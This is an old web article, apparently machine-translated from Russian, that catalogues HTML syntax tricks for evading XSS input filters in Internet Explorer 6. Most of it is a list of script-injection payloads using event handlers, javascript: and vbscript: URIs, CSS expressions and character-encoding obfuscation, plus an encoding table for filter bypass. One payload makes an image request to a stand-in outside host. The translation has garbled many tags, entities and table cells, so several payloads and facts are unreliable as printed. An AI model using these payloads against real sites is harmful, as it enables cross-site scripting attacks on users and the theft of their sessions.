Features of HTML Syntax
Creators: Algol , zFailure - last changes 13.06.2005
One of the main methods of protecting sites from XSS vulnerabilities is the use of different filters for user input characters. This article describes the features of HTML syntax, which allow you to bypass these filters.
It should be noted that XSS vulnerabilities are browser-dependent. All the examples below were tested in IE6. In other versions or in other browsers, the examples may also not work. For example, the character of the inverse apostrophe (`) is an attribute delimiter only in IE. Other browsers, such as Opera for example, do not in any way consider this symbol to be a deceptive.
In addition to the space, it is allowed to use the symbols: slash ( / ), tabulation, line feed. The delimiter is allowed to be omitted if the previous affiliation is enclosed in quotation marks.
<Image / src = "1.png" / alt = "Prompt" / border = "0"> <Image src = "1.png" alt = "Hint" border = "0"> <Image Src = "1.png" Alt = "Hint" Border = "0"> <Image src = "1.png" alt = "Hint" border = "0">
Values are allowed to be enclosed in quotation marks (double also single) also in apostrophes, only the general permission is not restricted.
<Image src = "" alt = "My tip" border = "0"> <Image src = "" alt = 'My tip' border = "0"> <Image src = "" alt = `My tip` border =" 0 "> <Image src = "" alt = Tip border = "0">
The decryption of characters in the script occurs before it is executed:
<Img src = javascript: alert (& quot; ok & quot;)> <Img src = javascript: alert (& # 039; ok & # 039;)> <Img src = & ##################################################################### & <a href=javascript:alert(%22ok%22)> click me </a> (only in the href attribute )
<Img src = javascript: alert ('ok')>
<Img src = javascript: alert ("ok")>
<Img src = javascript: a = / ok /; alert (a.source)>
<Img src = javascript: alert (String.fromCharCode (111,107))>
<Img src = javascript: i = new / ** / Image (); i.src = 'http: //bla.bla'> ( replacing the space with / ** /)
Several ways to automatically run scripts:
<Script> alert ('ok') </ script>
<Script src = 1.js> </ script>
<Body onLoad = alert ('ok')>
<Meta http-equiv = Refresh content = 0; url = javascript: alert ('ok')>
<Image src = 1.png onload = alert ('ok')>
<Image src = javascript: alert ('ok')>
<Image src = "" onerror = alert ('ok')>
<Hr style = background: url (javascript: alert ('ok')))>
<Span style = top: expression (alert ('ok')))> </ span>
<Span sss = "alert (); this.sss = null" style = top: expression (eval (this.sss));> </ span> (only works once) <style type = "text / css"> @import url (javascript: alert ('ok')); </ style>
<Object classid = clsid: ae24fdae-03c6-11d1-8b76-0080c744f389> <param name = url value = javascript: alert ('ok')> </ object>
<Embed src = javascript: alert ('ok'); this.avi>
<Embed src = javascript: alert ('ok'); this.wav>
<Iframe src = javascript: alert ('ok')> (only in IE) <a href=javascript:alert(%22ok%22)> click me </a> (launch only when clicking on the link) <a href = Javascript: alert ('aaa' + eval ('alert (); i = 2 + 2') + 'bbb')> click me </a> (launch only when clicking on the link) <br SIZE = "& {alert ('XSS')} "> (only Netscape 4.x)
<Img src = javascript: alert ()> <Img src = vbscript: AleRt ()> <Img src = JaVasCriPt: alert ()> <Img src = "javascript: alert ()"> (spaces up to javascript) <Img src = & # 106 & # 97 & # 118 & # 97 & # 115 & # 112 & # 116: alert ()> <Img src = javascript & # 9: alert ()> <Img src = javascript & # 10: alert ()> <Img src = javascript & # 13: alert ()> <Img src = "javascript : Alert () "> (before the colon - the tab character) <Img src = "java Scri Pt: ale. Rt () "> (inside the word javascript - the tab character also returns the carriage)
Script operators in the style attribute need to divide " \; ".
<Hr style = 'background: url (javascript: alert (' ok 1 ') \; alert (' ok 2 ')) `>
<Image src = "1.png" alt = "" border = "0"> (the img also works the same way) <plaintext> (anything that will move after this tag will be treated as plain text - not HTML) <Textarea> (everything that will move after this tag will be treated as plain text - not HTML in any way) <xml> (anything that will move after this tag will not be displayed in any way)
| Symbol | Decimal encoding | 16th encoding * | Character encoding | URL-encoding |
| " | & # 34 | & # X22; | & Quot; | % 22 |
| ' | & # 39 | & # X27; | % 27 | |
| " | & # 96 | & # X60; | % 60 | |
| <Space> | & # 32 | & # X20; | + | |
| <Tabs> | 	 | & # X09; | % 09 | |
| <Carriage return> | 
 | & # X0D; | % 0D | |
| = | & # 61 | & # X3D; | % 3D | |
| < | & # 60 | & # X3C; | & Lt; lt | % 3C |
| > | & # 62 | & # X3E; | & Gt | % 3E |
| \ | & # 92 | & # X5C; | % 5C | |
| % | & # 37 | & # X25; | % 25 | |
| + | & # 43 | & # X2B; | % 2B | |
| <Short hyphen> | & # 173 | & # XAD; | & Shy | % AD |
| & | & # 38 | & # X26; | & Amp | % 26 |
* -In some cases a semicolon can be omitted (if the character is at the end of the line, or in succession there are several characters in this encoding).
See similar: http://ha.ckers.org/xss.html
Liked? Subscribe to RSS news!
You can also support shram.kiev.ua, press:
You can also support shram.kiev.ua, press:
It will not be superfluous for your friends to learn this information, share their article with them!
Comments
Commenting on, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet, changes Not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.